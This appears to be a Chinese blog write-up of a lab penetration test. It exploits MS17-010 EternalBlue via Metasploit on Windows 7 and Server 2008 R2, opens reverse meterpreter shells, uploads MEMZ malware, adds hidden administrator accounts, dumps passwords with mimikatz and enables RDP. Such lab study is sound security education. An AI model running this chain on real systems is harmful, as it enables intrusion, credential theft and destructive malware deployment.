标签:Server2008R2 Windows Kali 192.168 010 ms17 445 smb
使用Kali系统对Windows7和Server 2008R2进行***测试
(MS17-010漏洞利用:上传MEMZ病毒)
1. 实验环境
测试平台:kali Linux
IP地址 :192.168.8.132
Linux kali 5.3.0-kali2-686-pae #1 SMP Debian 5.3.9-3kali1 (2019-11-20) i686 GNU/Linux
靶 机1:Windows 7 Professional SP1 x64
IP地址:192.168.8.133
靶 机2:Windows 7 Professional SP1 x64
IP地址:192.168.8.8
扫描端口:对192.168.8.0网段进行端口扫描,发现2台目标主机打开445端口
本实验网络拓扑图:
2. 实验内容
2.1 对Windows7进行***测试
root@kali:~# msfconsole /*注释 打开metasploit 注释*/
[-] ***rting the Metasploit Framework console...-
[-] * WARNING: No database support: No database YAML file
[-] ***
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v5.0.60-dev ]
+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 > search ms17-010 /*注释 搜索永恒之蓝漏洞ms17-010模块 注释*/
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
msf5 auxiliary(scanner/smb/smb_ms17_010) > show options /* 显示参数 */
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SMBDomain no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads (max one per host)
msf5 > use auxiliary/scanner/smb/smb_ms17_010 /* 使用漏洞扫描模块 */
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.133
rhosts => 192.168.8.133
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.8.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.133:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >
>use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) >
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.133
rhosts => 192.168.8.133
msf5 exploit(windows/smb/ms17_010_eternalblue) >
> set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132
lhost => 192.168.8.132
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.8.132:4444
[+] 192.168.8.133:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.133:445 - Connecting to target for exploitation.
[+] 192.168.8.133:445 - Connection established for exploitation.
[+] 192.168.8.133:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.8.133:445 - CORE raw buffer dump (42 bytes)
[*] 192.168.8.133:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Professional 7601 Service Pack 1
[+] 192.168.8.133:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[+] 192.168.8.133:445 - Sending SMBv2 buffers
[+] 192.168.8.133:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.8.133:445 - Sending final SMBv2 buffers.
[+] 192.168.8.133:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (206403 bytes) to 192.168.8.133
[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.133:49159) at 2020-03-17 01:09:21 -0400
[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=--=-WIN-=-=-==-=-=-=-=-=-=-=-=-
[+] 192.168.8.133:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
meterpreter >
meterpreter > sysinfo
Computer : TODD-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > screenshot
Screenshot saved to: /root/ZfhJyFXb.jpeg
meterpreter > lpwd
/root
meterpreter > lls
Listing Local: /root
====================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100644/rw-r--r-- 2740 fil 2020-03-17 00:19:35 -0400 .bash_history
100644/rw-r--r-- 3391 fil 2019-11-25 07:24:30 -0500 .bashrc
40755/rwxr-xr-x 4096 dir 2020-01-17 01:40:32 -0500 .config
40755/rwxr-xr-x 4096 dir 2020-01-10 05:37:10 -0500 .msf4
100644/rw-r--r-- 148 fil 2019-11-19 04:18:26 -0500 .profile
100600/rw------- 9825 fil 2020-03-16 22:14:37 -0400 .viminfo
40755/rwxr-xr-x 4096 dir 2020-01-17 02:53:20 -0500 Desktop
40755/rwxr-xr-x 4096 dir 2019-11-25 13:44:09 -0500 Documents
40755/rwxr-xr-x 4096 dir 2019-11-25 13:44:09 -0500 Downloads
100644/rw-r--r-- 14848 fil 2016-07-09 20:59:44 -0400 memz.exe
100644/rw-r--r-- 2527232 fil 2017-09-23 12:50:28 -0400 永恒之绿.exe
meterpreter > upload memz.exe c:\\
[*] uploading : memz.exe -> c:\
[*] uploaded : memz.exe -> c:\\memz.exe
meterpreter > download c:\\haha.txt
[*] Downloading: c:\haha.txt -> haha.txt
[*] Downloaded 8.00 B of 8.00 B (100.0%): c:\haha.txt -> haha.txt
[*] download : c:\haha.txt -> haha.txt
meterpreter > shell
Process 2772 created.
Channel 1 created.
Microsoft Windows [▒汾 6.1.7601]
▒▒Ȩ▒▒▒▒ (c) 2009 Microsoft Corporation▒▒▒▒▒▒▒▒▒▒Ȩ▒▒
C:\Windows\system32>
C:\Windows\system32>chcp 65001
chcp 65001
Active code page: 65001
C:\Windows\system32>cd \
C:\>
C:\>dir
Volume in drive C has no label.
Volume Serial Number is F496-8A44
Directory of C:\
2020/03/17 13:48 8 haha.txt
2020/03/17 13:48 14,848 memz.exe
2009/07/14 11:20 <DIR> PerfLogs
2020/01/10 21:19 <DIR> Program Files
2020/01/23 14:04 <DIR> Program Files (x86)
2020/01/10 21:14 <DIR> Users
2020/01/10 21:16 <DIR> Windows
2 File(s) 14,856 bytes
5 Dir(s) 52,709,482,496 bytes free
C:\Windows\system32>net user aa 123456 /add
net user aa 123456 /add
The command completed successfully.
C:\Windows\system32>net user
net user
User accounts for \\
---------------------------------------------------------------------------
aa Administrator Guest Todd
The command completed with one or more errors.
C:\Windows\system32>net user aa
net user aa
User name aa
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2020/3/17 14:02:43
Password expires 2020/4/28 14:02:43
Password changeable 2020/3/17 14:02:43
Password required Yes
User may change password Yes
Local Group Memberships *Users
Global Group memberships *None
The command completed successfully.
C:\Windows\system32>net localgroup administrators aa /add
net localgroup administrators aa /add
The command completed successfully.
C:\Windows\system32>net user aa
User name aa
Account active Yes
Account expires Never
Password last set 2020/3/17 14:02:43
Password expires 2020/4/28 14:02:43
Password changeable 2020/3/17 14:02:43
Password required Yes
Local Group Memberships *Administrators *Users
Global Group memberships *None
The command completed successfully.
C:\Windows\system32>exit
exit
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 7 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;999 NTLM WORKGROUP TODD-PC$
0;2454496 NTLM Todd-PC aa 123456
0;293566 NTLM Todd-PC Todd qwert
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022920_default_192.168.8.133_host.windows.cle_555893.txt
或者:
meterpreter > run post/windows/manage/enable_rdp USERNAME=bb PASSWORD=password
[*] Enabling Remote Desktop
[*] RDP is disabled; enabling it ...
[*] Setting Terminal Services service startup mode
[*] The Terminal Services service is not set to auto, changing it to auto ...
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: bb with Password: password
[*] Adding User: bb to local group 'Remote Desktop Users'
[*] Hiding user from Windows Login screen
[*] Adding User: bb to local group 'Administrators'
[*] You can now login with the created user
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317022750_default_192.168.8.133_host.windows.cle_306010.txt
meterpreter >
meterpreter >exit
msf5 exploit(windows/smb/ms17_010_eternalblue) > exit
root@kali:~#
2.2 对Windows Server 2008R2进行***测试
root@kali:~# msfconsole
[-] ***rting the Metasploit Framework console.../
[-] * WARNING: No database support: No database YAML file
+ -- --=[ 1947 exploits - 1089 auxiliary - 333 post ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops ]
+ -- --=[ 7 evasion ]
msf5 >
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.8.8
rhosts => 192.168.8.8
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.8.8:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.8:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 192.168.8.8
rhosts => 192.168.8.8
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.8.132
lhost => 192.168.8.132
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.8.132:4444
[+] 192.168.8.8:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Enterprise 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.8.8:445 - Connecting to target for exploitation.
[+] 192.168.8.8:445 - Connection established for exploitation.
[*] 192.168.8.8:445 - 0x00000000 57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32 Windows Server 2008 R2 Enterpris 7601 Service Pack 1
[+] 192.168.8.8:445 - Sending SMBv2 buffers
[+] 192.168.8.8:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.8.8:445 - Sending final SMBv2 buffers.
[+] 192.168.8.8:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Sending stage (206403 bytes) to 192.168.8.8
[*] Meterpreter session 1 opened (192.168.8.132:4444 -> 192.168.8.8:49160) at 2020-03-17 03:11:44 -0400
[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-==-WIN-=-=-=--=-=-=-=-=-=-=-=-
[+] 192.168.8.8:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
meterpreter >
meterpreter > sysinfo
Computer : WIN-2F0T37AEMO0
OS : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > screenshot
Screenshot saved to: /root/FEbrdmoh.jpeg
meterpreter > load mimikatz
Loading extension mimikatz...[!] Loaded Mimikatz on a newer OS (Windows 2008 R2 (6.1 Build 7601, Service Pack 1).). Did you mean to 'load kiwi' instead?
Success.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;996 Negotiate WORKGROUP WIN-2F0T37AEMO0$
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;254894 NTLM WIN-2F0T37AEMO0 Administrator a1!
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20200317031353_default_192.168.8.8_host.windows.cle_637762.txt
3. 实验结论
3.1 在kali终端中使用rdesktop远程桌面工具登录靶机:
root@kali:~# rdesktop 192.168.8.133
ATTENTION! Found a certificate stored for host '192.168.8.133', but it does not match the certificate
Certificate fingerprints:
sha1: cbbee169f5929f8c048c428feb6792fb66ab3446
sha256: 77dfda959a5f9717c08ecb6a224255f2cda71aa57695616e6c1c38e1f97d36c7
Do you trust this certificate (yes/no)? yes
3.2 在Windows 下使用远程桌面登录靶机:
Windows Server 2008 R2
标签:Server2008R2,Windows,Kali,192.168,010,ms17,445,smb 来源: https://blog.51cto.com/toddliu/2479733
本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享; 2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关; 3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关; 4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除; 5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。